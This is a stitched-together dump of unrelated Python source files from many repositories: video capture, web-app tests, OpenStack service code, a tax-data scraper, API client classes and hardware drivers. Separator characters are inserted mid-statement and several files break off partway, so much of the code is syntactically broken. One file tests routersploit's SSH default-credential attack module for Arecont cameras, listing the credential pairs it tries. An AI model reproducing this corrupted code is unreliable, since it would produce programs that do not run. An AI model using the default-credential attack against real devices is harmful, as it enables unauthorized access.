self.rgb = cv2.VideoCapture(rgbVideoPath)
cv2.waitKey(500)
# Open video access for Depth information
depthVideoPath=self.samplePath + os.path.sep + self.seqID + '_depth.mp4'
if not os.path.exists(depthVideoPath):
raise Exception("Invalid sample file. Depth data is not available")
self.depth = cv2.VideoCapture(depthVideoPath)
while not self.depth.isOpened():
self.depth = cv2.VideoCapture(depthVideoPath)
cv2.waitKey(500)
# Open video access for User segmentation information
userVideoPath=self.samplePath + os.path.sep + self.seqID + '_user.mp4'
if not os.path.exists(userVideoPath):
raise Exception("Invalid sample file. User segmentation data is not available")
self.user = cv2.VideoCapture(userVideoPath)
while not self.us |
Code4SA/pmg-cms-2 | tests/views/test_admin_view.py | Python | apache-2.0 | 894 | 0 | from tests import PMGLiveServerTestCase
from pmg.models import db
from tests.fixtures import dbfixture, UserData, RoleData
class TestAdminView(PMGLiveServerTestCase):
def setUp(self):
super(TestAdminView, self).setUp()
self.fx = dbfixture.data(RoleData, UserData,)
self.fx | .setup()
def tearDown(self):
self.fx.teardown()
super(TestAdminView, self).tearDown()
def test_admin_page_unauthorised(self):
| """
Test admin page (/admin) unauthorised
"""
self.make_request("/admin", follow_redirects=True)
self.assertIn("Login now", self.html)
def test_admin_page_authorised(self):
"""
Test admin page (/admin) authorised
"""
user = self.fx.UserData.admin
self.make_request("/admin", user, follow_redirects=True)
self.assertIn("Record counts", self.html)
|
Alberto-Beralix/Beralix | i386-squashfs-root/usr/lib/python2.7/dist-packages/duplicity/robust.py | Python | gpl-3.0 | 46 | 0.021739 | ../../.. | /../share/pyshared/dupl | icity/robust.py |
kizniche/Mycodo | mycodo/scripts/generate_manual_inputs_by_measure.py | Python | gpl-3.0 | 4,380 | 0.006164 | # -*- coding: utf-8 -*-
"""Generate markdown file of Input information to be inserted into the manual."""
import os
import sys
sys.path.append(os.path.abspath(os.path.join(__file__, "../../..")))
from collections import OrderedDict
from mycodo.utils.system_pi import add_custom_measurements
from mycodo.utils.system_pi import add_custom_units
from mycodo.config import INSTALL_DIRECTORY
from mycodo.utils.inputs import parse_input_information
from mycodo.databases.models import Measurement
from mycodo.databases.models import Unit
from mycodo.config import SQL_DATABASE_MYCODO
from mycodo.databases.utils import session_scope
MYCODO_DB_PATH = 'sqlite:///' + SQL_DATABASE_MYCODO
save_path = os.path.join(INSTALL_DIRECTORY, "docs/Supported-Inputs-By-Measurement.md")
inputs_info = OrderedDict()
mycodo_info = OrderedDict()
def repeat_to_length(s, wanted):
return (s * (wanted//len(s) + 1))[:wanted]
if __name__ == "__main__":
for input_id, input_data in parse_input_information(exclude_custom=True).items():
name_str = ""
if 'input_manufacturer' in input_data and input_data['input_manufacturer']:
name_str += "{}".format(input_data['input_manufacturer'])
if 'input_name' in input_data and input_data['input_name']:
name_str += ": {}".format(input_data['input_name'])
if 'measurements_name' in input_data and input_data['measurements_name']:
name_str += ": {}".format(input_data['measurements_name'])
if 'input_library' in input_data and input_data['input_library']:
name_str += ": {}".format(input_data['input_library'])
if name_str in inputs_info and 'dependencies_module' in inputs_info[name_str]:
# Multiple sets of dependencies, append library
inputs_info[name_str]['dependencies_module'].append(input_data['dependencies_module'])
else:
# Only one set of dependencies
inputs_info[name_str] = input_data
if 'dependencies_module' in input_data:
inputs_info[name_str]['dependencies_module'] = [input_data['dependencies_module']] # turn into list
inputs_info = dict(OrderedDict(sorted(inputs_info.items(), key = lambda t: t[0])))
with session_scope(MYCODO_DB_PATH) as new_session:
dict_measurements = add_custom_measurements(new_session.query(Measurement).all())
dict_units = add_custom_units(new_session.query(Unit).all())
dict_inputs = {}
for name, data in inputs_info.items():
if 'measurements_dict' not in data:
continue
for channel, measure in data['measurements_dict'].items():
if measure["measurement"]:
if measure["measurement"] not in dict_inputs:
dict_inputs[measure["measurement"]] = {}
dict_inputs[measure["measurement"]][name] = data
dict_inputs = dict(OrderedDict(sorted(dict_inputs.items(), key=lambda t: t[0])))
with open(save_path, 'w') as out_file:
# Table of contents
out_file.write("Measurements\n\n")
for measure, data in dict_inputs.items():
out_file.write(" - [{}](#{})\n".format(
dict_measurements[measure]["name"],
dict_measurements[measure]["name"]
.replace(" ", "-")
.replace("(", "")
.replace(")", "").lower()))
out_file.write("\n")
for measure, data in dict_inputs.items():
out_file.write("## {}\n\n".format(dict_measurements[measure]["name"]))
for each_name, each_data in data.items( | ):
name_str = ""
if 'input_manufacturer' in each_data and each_data['input_manufacturer']:
name_str += "{}".format(each_data['input_manufacturer'])
if 'input_name' in each_data and each_data['input_name']:
name_str += ": {}".format(each_data['input_name'])
link_str = name_str.lower()
link_str = link_str.replace(" ", "-").replace("(", "-").replace(")", | "-").replace(":", "-").replace(",", "-").replace("/", "-")
link_str = link_str.replace("--", "-").replace("--", "-").strip("-")
out_file.write("### [{}](/Mycodo/Supported-Inputs/#{})\n".format(name_str, link_str))
out_file.write("\n")
|
dasseclab/dasseclab | clones/routersploit/tests/creds/cameras/arecont/test_ssh_default_creds.py | Python | gpl-2.0 | 594 | 0.001684 | from routersploit.modules.creds.cameras.arecont.ssh_default_creds import Exploit
def test_check_success(target):
""" Test scenario - testing against SSH server """
| exploit = Exploit()
assert exploit.target == ""
assert exploit.port == 22
assert exploit.threads == 1
as | sert exploit.defaults == ["admin:", ":"]
assert exploit.stop_on_success is True
assert exploit.verbosity is True
exploit.target = target.host
exploit.port = target.port
assert exploit.check() is False
assert exploit.check_default() is None
assert exploit.run() is None
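# Illustrative invocation (the `target` fixture is supplied by the test
# suite's conftest; module path as in this repository):
# pytest tests/creds/cameras/arecont/test_ssh_default_creds.py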
|
Mausy5043/bonediagd | DHT22/bonediagd_DHT/platform_detect.py | Python | mit | 1,586 | 0.002522 | # Copyright (c) 2014 Adafruit Industries
# Au | thor: Tony DiCola
# Modified by Mauy5043 (2016)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the | Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This is a direct copy of what's in the Adafruit Python GPIO library:
# https://raw.githubusercontent.com/adafruit/Adafruit_Python_GPIO/master/Adafruit_GPIO/Platform.py
# TODO: Add dependency on Adafruit Python GPIO and use its platform detect
# functions.
import platform
import re
# Platform identification constants.
UNKNOWN = 0
RASPBERRY_PI = 1
BEAGLEBONE_BLACK = 2
def platform_detect():
return BEAGLEBONE_BLACK
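# Usage sketch: callers dispatch on the returned constant; on this fork it
# is hard-wired, e.g. (hypothetical pin mapping):
#
#   if platform_detect() == BEAGLEBONE_BLACK:
#       default_pin = 'P8_11'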
|
citrix-openstack-build/ironic | ironic/openstack/common/service.py | Python | apache-2.0 | 10,246 | 0 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic Node base class for all workers that run on hosts."""
import errno
import os
import random
import signal
import sys
import time
import eventlet
import logging as std_logging
from oslo.config import cfg
from ironic.openstack.common import eventlet_backdoor
from ironic.openstack.common.gettextutils import _
from ironic.openstack.common import importutils
from ironic.openstack.common import log as logging
from ironic.openstack.common import threadgroup
rpc = importutils.try_import('ironic.openstack.common.rpc')
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class Launcher(object):
"""Launch one or more services and wait for them to complete."""
def __init__(self):
"""Initialize the service launcher.
:returns: None
"""
self._services = threadgroup.ThreadGroup()
self.backdoor_port = eventlet_backdoor.initialize_if_enabled()
@staticmethod
def run_service(service):
"""Start and wait for a service to finish.
:param service: service to run and wait for.
:returns: None
"""
service.start()
service.wait()
def launch_service( | self, service):
"""Load and start the given service.
:param service: The service you would like to start.
:returns: None
"""
service.backdoor_port = self.backdoor_port
self._services.add_thread(self.run_service, service)
def stop(self):
"""Stop all services which a | re currently running.
:returns: None
"""
self._services.stop()
def wait(self):
"""Waits until all services have been stopped, and then returns.
:returns: None
"""
self._services.wait()
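# Usage sketch (MyService is a hypothetical Service subclass):
#
#   launcher = Launcher()
#   launcher.launch_service(MyService())
#   launcher.wait()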
class SignalExit(SystemExit):
def __init__(self, signo, exccode=1):
super(SignalExit, self).__init__(exccode)
self.signo = signo
class ServiceLauncher(Launcher):
def _handle_signal(self, signo, frame):
# Allow the process to be killed again and die from natural causes
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
raise SignalExit(signo)
def wait(self):
signal.signal(signal.SIGTERM, self._handle_signal)
signal.signal(signal.SIGINT, self._handle_signal)
LOG.debug(_('Full set of CONF:'))
CONF.log_opt_values(LOG, std_logging.DEBUG)
status = None
try:
super(ServiceLauncher, self).wait()
except SignalExit as exc:
signame = {signal.SIGTERM: 'SIGTERM',
signal.SIGINT: 'SIGINT'}[exc.signo]
LOG.info(_('Caught %s, exiting'), signame)
status = exc.code
except SystemExit as exc:
status = exc.code
finally:
if rpc:
rpc.cleanup()
self.stop()
return status
class ServiceWrapper(object):
def __init__(self, service, workers):
self.service = service
self.workers = workers
self.children = set()
self.forktimes = []
class ProcessLauncher(object):
def __init__(self):
self.children = {}
self.sigcaught = None
self.running = True
rfd, self.writepipe = os.pipe()
self.readpipe = eventlet.greenio.GreenPipe(rfd, 'r')
signal.signal(signal.SIGTERM, self._handle_signal)
signal.signal(signal.SIGINT, self._handle_signal)
def _handle_signal(self, signo, frame):
self.sigcaught = signo
self.running = False
# Allow the process to be killed again and die from natural causes
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
def _pipe_watcher(self):
# This will block until the write end is closed when the parent
# dies unexpectedly
self.readpipe.read()
LOG.info(_('Parent process has died unexpectedly, exiting'))
sys.exit(1)
def _child_process(self, service):
# Setup child signal handlers differently
def _sigterm(*args):
signal.signal(signal.SIGTERM, signal.SIG_DFL)
raise SignalExit(signal.SIGTERM)
signal.signal(signal.SIGTERM, _sigterm)
# Block SIGINT and let the parent send us a SIGTERM
signal.signal(signal.SIGINT, signal.SIG_IGN)
# Reopen the eventlet hub to make sure we don't share an epoll
# fd with parent and/or siblings, which would be bad
eventlet.hubs.use_hub()
# Close write to ensure only parent has it open
os.close(self.writepipe)
# Create greenthread to watch for parent to close pipe
eventlet.spawn_n(self._pipe_watcher)
# Reseed random number generator
random.seed()
launcher = Launcher()
launcher.run_service(service)
def _start_child(self, wrap):
if len(wrap.forktimes) > wrap.workers:
# Limit ourselves to one process a second (over the period of
# number of workers * 1 second). This will allow workers to
# start up quickly but ensure we don't fork off children that
# die instantly too quickly.
if time.time() - wrap.forktimes[0] < wrap.workers:
LOG.info(_('Forking too fast, sleeping'))
time.sleep(1)
wrap.forktimes.pop(0)
wrap.forktimes.append(time.time())
pid = os.fork()
if pid == 0:
# NOTE(johannes): All exceptions are caught to ensure this
# doesn't fallback into the loop spawning children. It would
# be bad for a child to spawn more children.
status = 0
try:
self._child_process(wrap.service)
except SignalExit as exc:
signame = {signal.SIGTERM: 'SIGTERM',
signal.SIGINT: 'SIGINT'}[exc.signo]
LOG.info(_('Caught %s, exiting'), signame)
status = exc.code
except SystemExit as exc:
status = exc.code
except BaseException:
LOG.exception(_('Unhandled exception'))
status = 2
finally:
wrap.service.stop()
os._exit(status)
LOG.info(_('Started child %d'), pid)
wrap.children.add(pid)
self.children[pid] = wrap
return pid
def launch_service(self, service, workers=1):
wrap = ServiceWrapper(service, workers)
LOG.info(_('Starting %d workers'), wrap.workers)
while self.running and len(wrap.children) < wrap.workers:
self._start_child(wrap)
def _wait_child(self):
try:
# Don't block if no child processes have exited
pid, status = os.waitpid(0, os.WNOHANG)
if not pid:
return None
except OSError as exc:
if exc.errno not in (errno.EINTR, errno.ECHILD):
raise
return None
if os.WIFSIGNALED(status):
sig = os.WTERMSIG(status)
LOG.info(_('Child %(pid)d killed by signal %(sig)d'),
dict(pid=pid, sig=sig))
else:
code = os.WEXITSTATUS(status)
LOG.info(_('Child %(pid)s exited with status %(code)d'),
|
PawarPawan/h2o-v3 | h2o-py/tests/testdir_algos/kmeans/pyunit_ozoneKmeans.py | Python | apache-2.0 | 589 | 0.03056 | imp | ort sys
sys.path.insert(1, " | ../../../")
import h2o
def ozoneKM(ip, port):
# Connect to a pre-existing cluster at localhost:54321
train = h2o.import_file(path=h2o.locate("smalldata/glm_test/ozone.csv"))
# See that the data is ready
print train.describe()
# Run KMeans
my_km = h2o.kmeans(x=train,
k=10,
init = "PlusPlus",
max_iterations = 100)
my_km.show()
my_km.summary()
my_pred = my_km.predict(train)
my_pred.describe()
if __name__ == "__main__":
h2o.run_test(sys.argv, ozoneKM)
|
antong/ldaptor | ldaptor/test/util.py | Python | lgpl-2.1 | 4,431 | 0.003611 | from twisted.python import failure
from twisted.internet import reactor, protocol, address, error
from twisted.test import testutils
from twisted.trial import unittest
from StringIO import StringIO
class FakeTransport(protocol.FileWrapper):
disconnecting = False
disconnect_done = False
def __init__(self, addr, peerAddr):
self.data = StringIO()
protocol.FileWrapper.__init__(self, self.data)
self.addr = addr
self.peerAddr = peerAddr
def getHost(self):
return self.addr
def getPeer(self):
return self.peerAddr
def loseConnection(self):
self.disconnecting = True
class FasterIOPump(testutils.IOPump):
def pump(self):
"""Move data back and forth.
Returns whether any data was moved.
"""
self.clientIO.seek(0)
self.serverIO.seek( | 0)
cData = self.clientIO.read()
sD | ata = self.serverIO.read()
self.clientIO.seek(0)
self.serverIO.seek(0)
self.clientIO.truncate()
self.serverIO.truncate()
self.server.dataReceived(cData)
self.client.dataReceived(sData)
if cData or sData:
return 1
else:
return 0
class IOPump(FasterIOPump):
active = []
def __init__(self,
client, server,
clientTransport, serverTransport):
self.clientTransport = clientTransport
self.serverTransport = serverTransport
testutils.IOPump.__init__(self,
client=client,
server=server,
clientIO=clientTransport.data,
serverIO=serverTransport.data)
self.active.append(self)
def pump(self):
FasterIOPump.pump(self)
if (self.clientTransport.disconnecting
and not self.clientTransport.data.getvalue()
and not self.clientTransport.disconnect_done):
self.server.connectionLost(error.ConnectionDone)
self.clientTransport.disconnect_done = True
if (self.serverTransport.disconnecting
and not self.serverTransport.data.getvalue()
and not self.serverTransport.disconnect_done):
self.client.connectionLost(error.ConnectionDone)
self.serverTransport.disconnect_done = True
if (self.clientTransport.disconnect_done
and self.serverTransport.disconnect_done):
self.active.remove(self)
def __repr__(self):
return '<%s client=%r/%r server=%r/%r>' % (
self.__class__.__name__,
self.client,
self.clientIO.getvalue(),
self.server,
self.serverIO.getvalue(),
)
def returnConnected(server, client,
clientAddress=None,
serverAddress=None):
"""Take two Protocol instances and connect them.
"""
if serverAddress is None:
serverAddress = address.IPv4Address('TCP', 'localhost', 1)
if clientAddress is None:
clientAddress = address.IPv4Address('TCP', 'localhost', 2)
clientTransport = FakeTransport(clientAddress, serverAddress)
client.makeConnection(clientTransport)
serverTransport = FakeTransport(serverAddress, clientAddress)
server.makeConnection(serverTransport)
pump = IOPump(client, server,
clientTransport,
serverTransport)
# Challenge-response authentication:
pump.flush()
# Uh...
pump.flush()
return pump
def _append(result, lst):
lst.append(result)
def _getDeferredResult(d, timeout=None):
if timeout is not None:
d.setTimeout(timeout)
resultSet = []
d.addBoth(_append, resultSet)
while not resultSet:
for pump in IOPump.active:
pump.pump()
reactor.iterate()
return resultSet[0]
def pumpingDeferredResult(d, timeout=None):
result = _getDeferredResult(d, timeout)
if isinstance(result, failure.Failure):
if result.tb:
raise result.value.__class__, result.value, result.tb
raise result.value
else:
return result
def pumpingDeferredError(d, timeout=None):
result = _getDeferredResult(d, timeout)
if isinstance(result, failure.Failure):
return result
else:
raise unittest.FailTest, "Deferred did not fail: %r" % (result,)
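# Usage sketch (MyClient/MyServer are hypothetical Protocol subclasses):
#
#   client, server = MyClient(), MyServer()
#   pump = returnConnected(server, client)
#   result = pumpingDeferredResult(client.someRequest(), timeout=5)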
|
tomachalek/kontext | lib/plugins/abstract/issue_reporting.py | Python | gpl-2.0 | 1,501 | 0.000666 | # Copyright (c) 2017 Charles University, Faculty | of Arts,
# Institute of the Czech National Corpus
# Copyright (c) 2017 Tomas Machalek <tomas.machalek@gmail.com>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2
# dated June, | 1991.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
class IssueReportingAction(object):
def to_dict(self):
return self.__dict__
class DynamicReportingAction(IssueReportingAction):
def __init__(self):
self.type = 'dynamic'
class StaticReportingAction(IssueReportingAction):
def __init__(self, url, args, label, blank_window):
self.url = url
self.args = args
self.label = label
self.blank_window = blank_window
self.type = 'static'
class AbstractIssueReporting(object):
def export_report_action(self, plugin_api):
raise NotImplementedError()
def submit(self, plugin_api, args):
raise NotImplementedError()
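# Implementation sketch (URL and label are hypothetical):
#
#   class ExternalTrackerReporting(AbstractIssueReporting):
#
#       def export_report_action(self, plugin_api):
#           return StaticReportingAction(
#               url='https://tracker.example.org/new', args={},
#               label='Report an issue', blank_window=True)
#
#       def submit(self, plugin_api, args):
#           pass  # nothing to submit for a purely static action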
|
kaze/paasmaker | paasmaker/common/api/application.py | Python | mpl-2.0 | 4,363 | 0.028879 | #
# Paasmaker - Platform as a Service
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
import loggin | g
import paasmaker
from apirequest import APIRequest, APIResponse
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
class ApplicationGetAPIRequest(APIRequest):
"""
Get the details for a single application.
"""
def __init__(self, *args, **kwargs):
super(ApplicationGetAPIRequest, self).__init__(*args, | **kwargs)
self.application_id = None
self.method = 'GET'
def set_application(self, application_id):
"""
Set the application ID for the request.
"""
self.application_id = application_id
def get_endpoint(self):
return '/application/%d' % self.application_id
class ApplicationListAPIRequest(APIRequest):
"""
List applications in a workspace.
"""
def __init__(self, *args, **kwargs):
super(ApplicationListAPIRequest, self).__init__(*args, **kwargs)
self.workspace_id = None
self.method = 'GET'
def set_workspace(self, workspace_id):
"""
Set the workspace ID to list the applications for.
"""
self.workspace_id = workspace_id
def get_endpoint(self):
return '/workspace/%d/applications' % self.workspace_id
class ApplicationNewAPIRequest(APIRequest):
"""
Create a new application.
"""
def __init__(self, *args, **kwargs):
self.params = {}
self.params['manifest_path'] = 'manifest.yml'
self.params['parameters'] = {}
self.workspace_id = None
super(ApplicationNewAPIRequest, self).__init__(*args, **kwargs)
def set_workspace(self, workspace_id):
"""
Set the workspace that this application belongs in.
"""
self.workspace_id = workspace_id
def set_uploaded_file(self, unique_identifier):
"""
If the source for this new version is an uploaded file,
this function sets the unique server-generated file
identifier for this version.
"""
self.params['uploaded_file'] = unique_identifier
def set_scm(self, scm):
"""
Set the SCM name for this new version.
"""
self.params['scm'] = scm
def set_parameters(self, parameters):
"""
Set the SCM parameters for this new version.
"""
self.params['parameters'] = parameters
def set_manifest_path(self, manifest_path):
"""
Set the manifest path inside the files. Defaults to ``manifest.yml``.
"""
self.params['manifest_path'] = manifest_path
def build_payload(self):
return self.params
def get_endpoint(self):
return '/workspace/%d/applications/new' % self.workspace_id
class ApplicationNewVersionAPIRequest(APIRequest):
"""
Create a new version of an existing application.
"""
def __init__(self, *args, **kwargs):
self.params = {}
self.params['manifest_path'] = 'manifest.yml'
self.params['parameters'] = {}
self.application_id = None
super(ApplicationNewVersionAPIRequest, self).__init__(*args, **kwargs)
def set_application(self, application_id):
"""
Set the application ID to create a new version for.
"""
self.application_id = application_id
def set_uploaded_file(self, unique_identifier):
"""
If the source for this new version is an uploaded file,
this function sets the unique server-generated file
identifier for this version.
"""
self.params['uploaded_file'] = unique_identifier
def set_scm(self, scm):
"""
Set the SCM name for this new version.
"""
self.params['scm'] = scm
def set_parameters(self, parameters):
"""
Set the SCM parameters for this new version.
"""
self.params['parameters'] = parameters
def set_manifest_path(self, manifest_path):
"""
Set the manifest path inside the files. Defaults to ``manifest.yml``.
"""
self.params['manifest_path'] = manifest_path
def build_payload(self):
return self.params
def get_endpoint(self):
return '/application/%d/newversion' % self.application_id
class ApplicationDeleteAPIRequest(APIRequest):
"""
Deletes an application.
"""
def __init__(self, *args, **kwargs):
super(ApplicationDeleteAPIRequest, self).__init__(*args, **kwargs)
self.application_id = None
def set_application(self, application_id):
"""
Set the application ID for the request.
"""
self.application_id = application_id
def get_endpoint(self):
return '/application/%d/delete' % self.application_id
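# Usage sketch (constructor arguments and SCM details are hypothetical):
#
#   request = ApplicationNewAPIRequest(configuration)
#   request.set_workspace(1)
#   request.set_scm('paasmaker.scm.git')
#   request.set_parameters({'location': 'git://example.com/app.git'})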
|
ktok07b6/polyphony | tests/error/loop_var01.py | Python | mit | 222 | 0.004505 | # Using the loop variable 'i' after its loop is restricted by polyphony's name scope rule
from polyphony im | port testbench
def loop_var01():
for i in range(10):
| pass
return i
@testbench
def test():
loop_var01()
test()
|
jirikuncar/kwalitee | kwalitee/wsgi.py | Python | gpl-2.0 | 1,154 | 0 | # -*- coding: utf-8 -*-
#
# This file is part of kwalitee
# Copyright (C) 2014, 2015 CERN.
#
# kwalitee is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# kwalitee is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPO | SE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with kwalitee; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
# In applying this lic | ence, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
"""WSGI application with debug middleware if in debug mode."""
from __future__ import absolute_import
from kwalitee import create_app
application = create_app("kwalitee")
|
lneuhaus/pyrpl | pyrpl/hardware_modules/ams.py | Python | gpl-3.0 | 859 | 0.002328 | from ..modules import HardwareModule
from ..attributes import PWMRegister
class AMS(HardwareModule):
"""mostly deprecated module (redpitaya has removed adc support).
only here for dac2 and dac3"""
addr_base = 0x40400000
# attention: writing to dac0 and dac1 has no effect
# only write to dac2 and 3 to set output voltages
# to modify dac0 and dac1, connect a r.pwm0.input='pid0'
# and let the pid module determine the voltage
dac0 = PW | MRegister(0x20, doc="PWM output 0 [V]")
dac1 = PWMRegister(0x24, doc="PWM output 1 [V]")
dac2 = PWMRegister(0x28, doc="PWM output 2 [V]")
dac3 = PWMRegister(0x2C, doc="PWM output 3 [V]")
def _setup(self): # the function is here for its docstring to be used by the metaclass.
"""
sets up the AMS (just setting the attributes is OK)
"""
pass
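# Usage sketch (assumes a connected pyrpl/RedPitaya instance `r`):
#
#   r.ams.dac2 = 0.5   # drive PWM output 2 to ~0.5 V
#   r.ams.dac3 = 1.2   # drive PWM output 3 to ~1.2 V
#   # dac0/dac1 writes have no effect here; route them through a pwm module,
#   # e.g. r.pwm0.input = 'pid0'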
| |
Algomorph/nyc-data-exploration | scraping/irs_tables/irs_table_scraper.py | Python | apache-2.0 | 6,902 | 0.012315 | #!/usr/bin/env python
# encoding: utf-8
'''
irs_table_scraper -- scrapes IRS data from www.melissadata.com for given zips
irs_table_scraper is a python script that reads in a list of zips and scrapes the
IRS data for those scrips from www.melissadata.com
@author: Gregory Kramida
@copyright: 2013 Gregory Kramida and Jonathan Gluck. All rights reserved.
@license: Apache License 2.0
@contact: GitHub: Algomorph
@deffield updated: Updated
'''
import sys
import os
import re
import tablescrape as tsc
import numpy as np
import time
from argparse import ArgumentParser
from argparse import RawDescriptionHelpFormatter
__all__ = []
__version__ = 0.1
__date__ = '2013-10-03'
__updated__ = '2013-10-03'
DEBUG = 1
TESTRUN = 0
PROFILE = 0
class CLIError(Exception):
'''Generic exception to raise and log different fatal errors.'''
def __init__(self, msg):
super(CLIError).__init__(type(self))
self.msg = "E: %s" % msg
def __str__(self):
return self.msg
def __unicode__(self):
return self.msg
def main(argv=None): # IGNORE:C0111
'''Command line options.'''
if argv is None:
argv = sys.argv
else:
sys.argv.extend(argv)
program_name = os.path.basename(sys.argv[0])
program_version = "v%s" % __version__
program_build_date = str(__updated__)
program_version_message = '%%(prog)s %s (%s)' % (program_version, program_build_date)
program_shortdesc = __import__('__main__').__doc__.split("\n")[1]
program_license = '''%s
Created by algomorph on %s.
Copyright 2013 Gregory Kramida and Jonathan Gluck. All rights reserved.
Licensed under the Apache License 2.0
http://www.apache.org/licenses/LICENSE-2.0
Distributed on an "AS IS" basis without warranties
or conditions of any kind, either express or implied.
USAGE
''' % (program_shortdesc, str(__date__))
try:
# Setup argument parser
parser = ArgumentParser(description=program_license, formatter_class=RawDescriptionHelpFormatter)
parser.add_argument("-v", "--verbose",default=0,type=int, dest="verbose", help="set verbosity level [default: %(default)s]")
parser.add_argument('-V', '--version', action='version', version=program_version_message)
parser.add_argument('-z', "--zip_codes",default="zip_codes.csv",dest="zip_codes", help="Path to the file containing 5-digit zip codes in a single column.")
parser.add_argument('-n', "--num_zips",type=int,default=500000, help="Total number of zip code areas to process")
parser.add_argument('-o', "--output",default="zip_income.csv", help="Path to the output csv file. Existing file will be overwritten.")
parser.add_argument('-e', "--error_file",default="errors.csv", help="Path to the error csv file. Existing file will be overwritten.")
# Process arguments
args = parser.parse_args()
verbose = args.verbose
zip_path = args.zip_codes
out_path = args.output
err_path = args.error_file
if verbose > 0:
print("Verbose mode on")
if(not os.path.isfile(zip_path)):
raise CLIError("Could not find text file at " % zip_path)
#read zips
f = open(zip_path);
zips = sorted(f.readlines());
f.close()
#find proper upper bound
n_zips = min(len(zips),args.num_zips)
#prepare data structure for output
n_years = 11
first_year = 2000
out_arr = np.empty((n_zips*n_years,19),dtype=np.int32)
tcell_regex = re.compile('td|th')
cell_format_regex = re.compile('%|\$|,')
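# e.g. cell_format_regex.sub("", "$1,234") -> "1234"
# and cell_format_regex.sub("", "57%") -> "57"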
i_out_row = 0
errors = []
for i_zip in xrange(0,n_zips):
szip = zips[i_zip].rstrip()
if(verbose > 0):
print "Processing zip %s, %d of %d" % (szip, i_zip, n_zips)
url = "http://www.melissadata.com/lookups/TaxZip.asp?Zip="+szip+"&submit1=Submit"
soup = tsc.opensoup(url)
tables = soup.findAll("table")
table = tables[5]
#skip first two rows - table header and year column headers
| #also skip last row - footer
rows = table.findAll('tr')
if(len(rows) != 24):
if verbose > 0:
print "Missing data for zip %s" % szip
continue
rows = rows[2:19]
#prep the first 10 rows
out_arr[i_out_row:i_out_row+n_years,0] = [int(szip)]*n_years #zip goes in first col
out_arr[i_out_row:i_out_row+n_years,1] = range(first_year,first_year + n_years) #years go in second col
| i_out_col = 2
for row in rows:
#skip first cell (row header)
cells = row.findAll(tcell_regex)[1:]
i_year = 0
for cell in cells:
#strip tags, $, %, and remove commas
str_cell = cell_format_regex.sub("",tsc.striptags(cell.renderContents()))
if(str_cell != "N/A"):
try:
out_arr[i_out_row+i_year,i_out_col] = int(str_cell)
except ValueError, ve:
out_arr[i_out_row+i_year,i_out_col] = -1000000
errors.append([int(szip), first_year + i_year, i_out_col])
pass  # don't abort the whole scrape on one unparseable cell
else:
out_arr[i_out_row+i_year,i_out_col] = -999999
i_year +=1
i_out_col+=1
i_out_row += n_years
time.sleep(1)
#store output
np.savetxt(out_path, out_arr, delimiter = ",", fmt='%d')
np.savetxt(err_path, np.asarray(errors,dtype=np.int32), delimiter = ",", fmt='%d')
return 0
except KeyboardInterrupt:
### handle keyboard interrupt ###
return 0
'''
except Exception, e:
if DEBUG or TESTRUN:
raise(e)
indent = len(program_name) * " "
sys.stderr.write(program_name + ": " + repr(e) + "\n")
sys.stderr.write(indent + " for help use --help")
return 2
'''
if __name__ == "__main__":
if DEBUG:
sys.argv.append("-v=1")
if TESTRUN:
import doctest
doctest.testmod()
if PROFILE:
import cProfile
import pstats
profile_filename = 'irs_table_scraper_profile.txt'
cProfile.run('main()', profile_filename)
statsfile = open("profile_stats.txt", "wb")
p = pstats.Stats(profile_filename, stream=statsfile)
stats = p.strip_dirs().sort_stats('cumulative')
stats.print_stats()
statsfile.close()
sys.exit(0)
sys.exit(main())
|
